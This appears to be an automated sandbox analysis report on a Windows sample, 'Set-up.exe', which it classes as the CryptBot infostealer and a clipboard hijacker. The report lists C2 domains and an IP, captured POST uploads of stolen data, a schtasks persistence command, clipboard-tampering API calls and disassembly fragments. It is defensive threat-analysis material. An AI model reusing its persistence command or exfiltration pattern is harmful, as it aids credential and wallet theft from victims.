Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1521577
MD5: d9bdb4ba2a45c67f4da4e431ff988605
SHA1: 4cdd27ca0a92a35e5eea6e588422339bdd9b05ba
SHA256: 9e61196ade3f31620d62422741e66bd19f0bd4744e2f6a5f8a2481cfb8f9b9d9
Tags: exe, user-aachum

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: Set-up.exe.7100.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["+elevenvh11pt.top", "11pt.top", "@elevenvh11pt.top", "elevenvh11pt.top", "analforeverlovyu.top"]}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_006F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2C14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2C14B0
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_006F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2E0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C39F990h 4_2_6C2DEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2E4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C3684A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2EC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C360730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2E0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C31A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2E0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C39D014h] 4_2_6C394360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C337D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C333840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 4_2_6C2ED974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C319B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2FBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2FBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2ED504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_6C339600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 4_2_6C2ED674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C39DFF4h 4_2_6C333690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 4_2_6C2ED7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C363140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2DB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2ED2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C357350

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 185.244.181.140:80
Source: Malware configuration extractor URLs: +elevenvh11pt.top
Source: Malware configuration extractor URLs: 11pt.top
Source: Malware configuration extractor URLs: @elevenvh11pt.top
Source: Malware configuration extractor URLs: elevenvh11pt.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Joe Sandbox View IP Address: 185.244.181.140
Source: Joe Sandbox View ASN Name: BELCLOUDBG
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary33730321
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 410
    Host: elevenvh11pt.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary17398190
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 89745
    Host: elevenvh11pt.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary32471747
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 29706
    Host: elevenvh11pt.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: elevenvh11pt.top
Source: unknown HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary33730321
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 410
    Host: elevenvh11pt.top
Source: Set-up.exe, 00000000.00000003.1838220618.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.000000000143C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvh11pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvh11pt.top/v1/upload.phpP
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 4_2_6C2D9E27

System Summary

Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F51B0 4_2_006F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F3E20 4_2_006F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C302CCE 4_2_6C302CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2CCD00 4_2_6C2CCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2CEE50 4_2_6C2CEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D0FC0 4_2_6C2D0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310AC0 4_2_6C310AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D44F0 4_2_6C2D44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3046E0 4_2_6C3046E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3007D0 4_2_6C3007D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F87C0 4_2_6C2F87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310060 4_2_6C310060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C302090 4_2_6C302090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F2360 4_2_6C2F2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C31DC70 4_2_6C31DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D5880 4_2_6C2D5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F98F0 4_2_6C2F98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C307A20 4_2_6C307A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30DBEE 4_2_6C30DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30140E 4_2_6C30140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C311510 4_2_6C311510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30F610 4_2_6C30F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2EF760 4_2_6C2EF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2C3000 4_2_6C2C3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3850D0 4_2_6C3850D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D70C0 4_2_6C2D70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C395980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C38ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3936E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C395A70 appears 77 times
Source: Set-up.exe, 00000000.00000002.2324509023.0000000001473000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\fvDNEDWLqd
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\cyUfSaAVoKrgDgBDsopT
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 9979392 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_006F8230
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006FA499 push es; iretd 4_2_006FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C370C30 push eax; mov dword ptr [esp], edi 4_2_6C370DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33ED10 push eax; mov dword ptr [esp], ebx 4_2_6C33EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C314E31 push eax; mov dword ptr [esp], ebx 4_2_6C314E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308E7A push edx; mov dword ptr [esp], ebx 4_2_6C308E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A947 push eax; mov dword ptr [esp], ebx 4_2_6C30A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33EAB0 push eax; mov dword ptr [esp], ebx 4_2_6C33EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328AA0 push eax; mov dword ptr [esp], ebx 4_2_6C32909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310AA2 push eax; mov dword ptr [esp], ebx 4_2_6C310AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C312AAC push edx; mov dword ptr [esp], ebx 4_2_6C312AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342BF0 push eax; mov dword ptr [esp], ebx 4_2_6C342F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342BF0 push edx; mov dword ptr [esp], ebx 4_2_6C342F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308435 push edx; mov dword ptr [esp], ebx 4_2_6C308449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328460 push eax; mov dword ptr [esp], ebx 4_2_6C328A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30048B push eax; mov dword ptr [esp], ebx 4_2_6C3004A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3004E0 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx 4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2E1CFA push eax; mov dword ptr [esp], ebx 4_2_6C396622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A5A7 push eax; mov dword ptr [esp], ebx 4_2_6C30A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342620 push eax; mov dword ptr [esp], ebx 4_2_6C342954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342620 push edx; mov dword ptr [esp], ebx 4_2_6C342973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3506B0 push eax; mov dword ptr [esp], ebx 4_2_6C350A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3186A1 push 890005EAh; ret 4_2_6C3186A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006A2 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006A6 push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
